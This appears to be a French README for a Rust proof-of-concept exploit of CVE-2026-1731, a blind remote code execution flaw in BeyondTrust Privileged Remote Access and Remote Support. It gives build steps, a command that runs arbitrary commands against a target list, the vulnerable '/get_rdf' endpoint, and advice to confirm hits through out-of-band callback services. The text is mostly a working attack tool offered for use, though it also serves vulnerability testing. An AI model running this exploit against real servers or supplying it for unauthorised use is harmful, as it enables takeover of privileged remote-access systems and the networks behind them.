
Preuve de concept d'exploitation pour CVE-2026-1731, une RCE aveugle dans BeyondTrust Privileged Remote Access et Remote Support, permettant l'exécution de commandes à distance sur les versions vulnérables.
Pour plus d'informations, je vous recommande de lire l'analyse d'attackerkb.com.
Vous aurez besoin des outils suivants pour compiler ce PoC : Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 se trouvera dans target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Vous pouvez exécuter ./CVE-2026-1731 -h pour afficher la liste des options disponibles.
./CVE-2026-1731 --targets targets.txt --command "whoami"
Remarque : Étant donné que CVE-2026-1731 est une RCE aveugle, aucune réponse n'est renvoyée par l'hôte qui pourrait servir d'indicateur de vulnérabilité. Une requête peut aboutir, mais une cible non vulnérable ne déclenchera pas la RCE. Il est recommandé d'utiliser un service comme webhook.site ou PortSwigger's Burp Collaborator pour tester les cibles. Un échec ou un succès dans ce PoC est déterminé selon que le serveur répond avec un code de statut 200 ou non.
GET /get_rdf?comp=sdcust&locale_code=en-us.